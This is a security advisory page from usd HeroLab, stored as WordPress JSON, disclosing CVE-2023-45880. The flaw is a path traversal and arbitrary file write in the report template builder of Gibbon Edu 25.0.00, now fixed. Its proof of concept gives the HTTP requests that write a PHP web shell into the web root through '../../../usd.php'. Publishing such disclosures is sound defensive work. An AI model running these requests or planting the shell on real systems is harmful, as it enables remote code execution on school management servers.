{"id":21356,"date":"2023-11-10T11:50:06","date_gmt":"2023-11-10T10:50:06","guid":{"rendered":"https:\/\/herolab.usd.de\/security-advisories\/usd-2023-0022\/"},"modified":"2023-11-14T15:25:34","modified_gmt":"2023-11-14T14:25:34","slug":"usd-2023-0022","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2023-0022\/","title":{"rendered":"usd-2023-0022"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.23.1\" _module_preset=\"default\" custom_padding=\"||13px|||\" global_colors_info=\"{}\"]<\/p>\n

usd-2023-0022 | Path-Traversal<\/h1>\n

<\/h1>\n

Advisory ID<\/strong>: usd-2023-0022
Product<\/strong>: Gibbon (https:\/\/gibbonedu.org\/)
Affected Version<\/strong>: 25.0.00
Vulnerability Type<\/strong>: CWE-23: Path-Traversal<\/span>
Security Risk<\/strong>: Critical
Vendor URL<\/strong>: https:\/\/gibbonedu.org<\/a>
Vendor acknowledged vulnerability<\/strong>: Yes
Vendor Status<\/strong>: Fixed
CVE number<\/strong>: CVE-2023-45880<\/p>\n

Desciption<\/h3>\n

Gibbon Edu is an open-source educational software designed for schools and institutions to manage their administrative and academic processes
It offers a range of features to facilitate communication, collaboration, and organization within the educational community.<\/p>\n

The application allows high priviliged users to create report templates.
The report template builder is vulnerable to a Path Traversal vulnerability.<\/p>\n

The \"uploads\" directory is not accessible by default, however it is possible to write files directly in the web root.
Even the file extension can be manipulated which results in an arbitrary file write vulnerability.<\/p>\n

Proof of Concept<\/h3>\n

In the first step, we need to duplicate one of the existing assets. This can be done on the Home > Reports > Template Builder > Manage Assets<\/strong> page.<\/p>\n

\"\"<\/p>\n

The original request that is triggered is shown below:<\/p>\n

\n
<\/span>POST<\/span> \/modules\/Reports\/templates_assets_components_duplicateProcess.php<\/span> HTTP<\/span>\/<\/span>1.1<\/span>\nHost<\/span>:<\/span> localhost:8080<\/span>\n[...]<\/span>\n\n------WebKitFormBoundaryGDOtYymhe5cRMATP\nContent-Disposition: form-data; name=\"address\"\n\n\/modules\/Reports\/templates_assets_components_duplicate.php\n------WebKitFormBoundaryGDOtYymhe5cRMATP\nContent-Disposition: form-data; name=\"gibbonReportPrototypeSectionID\"\n\n0000000025\n------WebKitFormBoundaryGDOtYymhe5cRMATP\nContent-Disposition: form-data; name=\"templateFileDestination\"\n\nfooters\/pageNumber.twig.html\n------WebKitFormBoundaryGDOtYymhe5cRMATP--\n<\/pre>\n<\/div>\n
The templateFileDestination<\/strong> parameter shows where the component template will be saved to. The file can be moved to the webroot, to make it accessible. An attacker can even change the file extension to php<\/strong>.<\/p>\n
\n
<\/span>POST<\/span> \/modules\/Reports\/templates_assets_components_duplicateProcess.php<\/span> HTTP<\/span>\/<\/span>1.1<\/span>\nHost<\/span>:<\/span> localhost:8080<\/span>\n[...]<\/span>\n\n------WebKitFormBoundaryGDOtYymhe5cRMATP\nContent-Disposition: form-data; name=\"address\"\n\n\/modules\/Reports\/templates_assets_components_duplicate.php\n------WebKitFormBoundaryGDOtYymhe5cRMATP\nContent-Disposition: form-data; name=\"gibbonReportPrototypeSectionID\"\n\n0000000025\n------WebKitFormBoundaryGDOtYymhe5cRMATP\nContent-Disposition: form-data; name=\"templateFileDestination\"\n\n..\/..\/..\/usd.php\n------WebKitFormBoundaryGDOtYymhe5cRMATP--\n<\/pre>\n<\/div>\n
The file can be created from within the web application. You can insert PHP code and receive remote code execution.<\/p>\n
\"\"<\/p>\n
This will result in the following request to be triggered<\/p>\n
\n
<\/span>POST<\/span> \/modules\/Reports\/templates_assets_components_editProcess.php<\/span> HTTP<\/span>\/<\/span>1.1<\/span>\nHost<\/span>:<\/span> localhost:8080<\/span>\n[...]<\/span>\n\n------WebKitFormBoundaryfnqLMucCLAXR1frS\nContent-Disposition: form-data; name=\"address\"\n\n\/modules\/Reports\/templates_assets_components_edit.php\n------WebKitFormBoundaryfnqLMucCLAXR1frS\nContent-Disposition: form-data; name=\"gibbonReportPrototypeSectionID\"\n\n0000000028\n------WebKitFormBoundaryfnqLMucCLAXR1frS\nContent-Disposition: form-data; name=\"name\"\n\nPage Number\n------WebKitFormBoundaryfnqLMucCLAXR1frS\nContent-Disposition: form-data; name=\"templateFile\"\n\n..\/..\/..\/usd.php\n------WebKitFormBoundaryfnqLMucCLAXR1frS\nContent-Disposition: form-data; name=\"templateContent\"\n\n<?php echo system($_GET['cmd']);?>\n------WebKitFormBoundaryfnqLMucCLAXR1frS--\n<\/pre>\n<\/div>\n
It should be noted, that the frontend will return an error that the request \"failed due to a database error\". However, the file is still created and populated with the payload.
The following screenshot shows, that the file was successfully created and populated with the payload.
\"\"<\/p>\n
 <\/p>\n
[\/et_pb_text][\/et_pb_column][\/et_pb_row][et_pb_row _builder_version=\"4.23.1\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.23.1\" _module_preset=\"default\" type=\"4_4\"][et_pb_text _builder_version=\"4.23.1\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<\/p>\n
This vulnerability can be chained with others, resulting in an exploit path that we demonstrated in this video:<\/p>\n
[\/et_pb_text][et_pb_code _builder_version=\"4.23.1\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"|379px||||\"]